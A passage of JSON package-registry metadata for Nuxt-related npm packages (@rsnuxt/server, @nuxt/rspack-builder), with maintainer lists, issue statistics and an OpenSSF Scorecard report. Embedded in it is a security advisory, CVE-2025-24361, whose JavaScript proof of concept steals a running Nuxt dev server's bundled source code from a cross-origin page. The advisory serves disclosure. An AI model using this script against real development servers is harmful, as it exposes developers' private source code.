vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:01.487Z","dependent_packages_count":0,"downloads":790,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/server/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fserver/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:23.252Z","updated_at":"2025-02-11T09:42:23.252Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":10922073,"name":"@nuxt/rspack-builder","ecosystem":"npm","description":"rspack bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":54,"first_release_published_at":"2024-09-24T15:07:49.319Z","latest_release_published_at":"2026-04-29T23:47:19.407Z","latest_release_number":"4.4.4","last_synced_at":"2026-05-10T11:04:18.598Z","created_at":"2024-09-24T15:10:10.448Z","updated_at":"2026-05-10T13:10:07.043Z","registry_url":"https://www.npmjs.com/package/@nuxt/rspack-builder","install_command":"npm install @nuxt/rspack-builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","3x":"3.21.4","latest":"4.4.4"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-10T13:10:07.017Z","dependent_packages_count":0,"downloads":2572,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.740682484370218,"dependent_packages_count":37.37762528552416,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.55915388494719},"purl":"pkg:npm/%40nuxt/rspack-builder","advisories":[{"uuid":"GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","url":"https://github.com/advisories/GHSA-4gf7-ff8x-hq99","title":"Opening a malicious website while running a Nuxt dev server could allow read-only access to code","description":"### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement('script')\nscript.src = 'http://localhost:3000/_nuxt/app.js'\nscript.addEventListener('load', () =\u003e {\n  for (const page in window.webpackChunknuxt_app) {\n    const moduleList = window.webpackChunknuxt_app[page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement('p')\n      const title = document.createElement('strong')\n      title.textContent = key\n      const code = document.createElement('code')\n      code.textContent = moduleList[key].toString()\n      p.append(title, ':', document.createElement('br'), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n\n![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-27T11:31:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99","https://nvd.nist.gov/vuln/detail/CVE-2025-24361","https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f","https://github.com/advisories/GHSA-4gf7-ff8x-hq99"],"source_kind":"github","identifiers":["GHSA-4gf7-ff8x-hq99","CVE-2025-24361"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":0.0,"created_at":"2025-01-27T12:09:15.495Z","updated_at":"2026-05-09T06:03:28.674Z","epss_percentage":0.00253,"epss_percentile":0.48544,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","packages":[{"ecosystem":"npm","package_name":"@nuxt/rspack-builder","versions":[{"first_patched_version":"3.15.3","vulnerable_version_range":"\u003e= 3.12.2, \u003c 3.15.3"}],"purl":"pkg:npm/%40nuxt%2Frspack-builder"},{"ecosystem":"npm","package_name":"@nuxt/webpack-builder","versions":[{"first_patched_version":"3.15.3","vulnerable_version_range":"\u003e= 3.0.0, \u003c 3.15.3"}],"purl":"pkg:npm/%40nuxt%2Fwebpack-builder"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/rspack-builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/rspack-builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/rspack-builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-25T14:00:24.179Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385